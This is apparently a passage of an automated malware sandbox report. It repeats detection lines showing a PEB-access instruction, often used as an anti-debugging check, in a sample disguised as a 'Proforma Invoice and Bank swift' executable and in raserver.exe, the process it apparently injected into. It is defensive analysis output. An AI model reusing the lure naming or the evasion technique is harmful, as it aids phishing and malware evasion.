Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00BA1C06
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]	2_2_00B66C0A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]	2_2_00B66C0A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]	2_2_00B66C0A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]	2_2_00B66C0A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]	2_2_00B1AC7B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0746D mov eax, dword ptr fs:[00000030h]	2_2_00B0746D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7C450 mov eax, dword ptr fs:[00000030h]	2_2_00B7C450
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7C450 mov eax, dword ptr fs:[00000030h]	2_2_00B7C450
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1A44B mov eax, dword ptr fs:[00000030h]	2_2_00B1A44B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B11DB5 mov eax, dword ptr fs:[00000030h]	2_2_00B11DB5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B11DB5 mov eax, dword ptr fs:[00000030h]	2_2_00B11DB5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B11DB5 mov eax, dword ptr fs:[00000030h]	2_2_00B11DB5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B135A1 mov eax, dword ptr fs:[00000030h]	2_2_00B135A1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB05AC mov eax, dword ptr fs:[00000030h]	2_2_00BB05AC
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB05AC mov eax, dword ptr fs:[00000030h]	2_2_00BB05AC
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00AE2D8A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00AE2D8A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00AE2D8A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00AE2D8A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00AE2D8A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1FD9B mov eax, dword ptr fs:[00000030h]	2_2_00B1FD9B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1FD9B mov eax, dword ptr fs:[00000030h]	2_2_00B1FD9B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]	2_2_00B12581
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]	2_2_00B12581
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]	2_2_00B12581
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]	2_2_00B12581
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B98DF1 mov eax, dword ptr fs:[00000030h]	2_2_00B98DF1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFD5E0 mov eax, dword ptr fs:[00000030h]	2_2_00AFD5E0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFD5E0 mov eax, dword ptr fs:[00000030h]	2_2_00AFD5E0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00BAFDE2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00BAFDE2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00BAFDE2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00BAFDE2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00B66DC9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00B66DC9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00B66DC9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66DC9 mov ecx, dword ptr fs:[00000030h]	2_2_00B66DC9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00B66DC9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00B66DC9
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B6A537 mov eax, dword ptr fs:[00000030h]	2_2_00B6A537
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAE539 mov eax, dword ptr fs:[00000030h]	2_2_00BAE539
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B14D3B mov eax, dword ptr fs:[00000030h]	2_2_00B14D3B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B14D3B mov eax, dword ptr fs:[00000030h]	2_2_00B14D3B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B14D3B mov eax, dword ptr fs:[00000030h]	2_2_00B14D3B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB8D34 mov eax, dword ptr fs:[00000030h]	2_2_00BB8D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00AF3D34
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEAD30 mov eax, dword ptr fs:[00000030h]	2_2_00AEAD30
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0C577 mov eax, dword ptr fs:[00000030h]	2_2_00B0C577
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0C577 mov eax, dword ptr fs:[00000030h]	2_2_00B0C577
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B07D50 mov eax, dword ptr fs:[00000030h]	2_2_00B07D50
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B23D43 mov eax, dword ptr fs:[00000030h]	2_2_00B23D43
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B63540 mov eax, dword ptr fs:[00000030h]	2_2_00B63540
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B93D40 mov eax, dword ptr fs:[00000030h]	2_2_00B93D40
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B646A7 mov eax, dword ptr fs:[00000030h]	2_2_00B646A7
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0EA5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0EA5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0EA5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7FE87 mov eax, dword ptr fs:[00000030h]	2_2_00B7FE87
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF76E2 mov eax, dword ptr fs:[00000030h]	2_2_00AF76E2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B116E0 mov ecx, dword ptr fs:[00000030h]	2_2_00B116E0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB8ED6 mov eax, dword ptr fs:[00000030h]	2_2_00BB8ED6
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B28EC7 mov eax, dword ptr fs:[00000030h]	2_2_00B28EC7
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B9FEC0 mov eax, dword ptr fs:[00000030h]	2_2_00B9FEC0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B136CC mov eax, dword ptr fs:[00000030h]	2_2_00B136CC
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B9FE3F mov eax, dword ptr fs:[00000030h]	2_2_00B9FE3F
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEE620 mov eax, dword ptr fs:[00000030h]	2_2_00AEE620
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1A61C mov eax, dword ptr fs:[00000030h]	2_2_00B1A61C
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1A61C mov eax, dword ptr fs:[00000030h]	2_2_00B1A61C
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEC600 mov eax, dword ptr fs:[00000030h]	2_2_00AEC600
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEC600 mov eax, dword ptr fs:[00000030h]	2_2_00AEC600
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEC600 mov eax, dword ptr fs:[00000030h]	2_2_00AEC600
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B18E00 mov eax, dword ptr fs:[00000030h]	2_2_00B18E00
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1608 mov eax, dword ptr fs:[00000030h]	2_2_00BA1608
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF766D mov eax, dword ptr fs:[00000030h]	2_2_00AF766D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]	2_2_00B0AE73
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]	2_2_00B0AE73
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]	2_2_00B0AE73
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]	2_2_00B0AE73
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]	2_2_00B0AE73
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]	2_2_00AF7E41
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]	2_2_00AF7E41
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]	2_2_00AF7E41
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]	2_2_00AF7E41
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]	2_2_00AF7E41
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]	2_2_00AF7E41
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAAE44 mov eax, dword ptr fs:[00000030h]	2_2_00BAAE44
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAAE44 mov eax, dword ptr fs:[00000030h]	2_2_00BAAE44
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B67794 mov eax, dword ptr fs:[00000030h]	2_2_00B67794
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B67794 mov eax, dword ptr fs:[00000030h]	2_2_00B67794
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B67794 mov eax, dword ptr fs:[00000030h]	2_2_00B67794
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF8794 mov eax, dword ptr fs:[00000030h]	2_2_00AF8794
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B237F5 mov eax, dword ptr fs:[00000030h]	2_2_00B237F5
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE4F2E mov eax, dword ptr fs:[00000030h]	2_2_00AE4F2E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE4F2E mov eax, dword ptr fs:[00000030h]	2_2_00AE4F2E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1E730 mov eax, dword ptr fs:[00000030h]	2_2_00B1E730
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B73D mov eax, dword ptr fs:[00000030h]	2_2_00B0B73D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B73D mov eax, dword ptr fs:[00000030h]	2_2_00B0B73D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0F716 mov eax, dword ptr fs:[00000030h]	2_2_00B0F716
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7FF10 mov eax, dword ptr fs:[00000030h]	2_2_00B7FF10
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7FF10 mov eax, dword ptr fs:[00000030h]	2_2_00B7FF10
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB070D mov eax, dword ptr fs:[00000030h]	2_2_00BB070D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB070D mov eax, dword ptr fs:[00000030h]	2_2_00BB070D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1A70E mov eax, dword ptr fs:[00000030h]	2_2_00B1A70E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1A70E mov eax, dword ptr fs:[00000030h]	2_2_00B1A70E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFFF60 mov eax, dword ptr fs:[00000030h]	2_2_00AFFF60
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB8F6A mov eax, dword ptr fs:[00000030h]	2_2_00BB8F6A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFEF40 mov eax, dword ptr fs:[00000030h]	2_2_00AFEF40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D88CD6 mov eax, dword ptr fs:[00000030h]	7_2_04D88CD6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36CF0 mov eax, dword ptr fs:[00000030h]	7_2_04D36CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36CF0 mov eax, dword ptr fs:[00000030h]	7_2_04D36CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36CF0 mov eax, dword ptr fs:[00000030h]	7_2_04D36CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D714FB mov eax, dword ptr fs:[00000030h]	7_2_04D714FB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
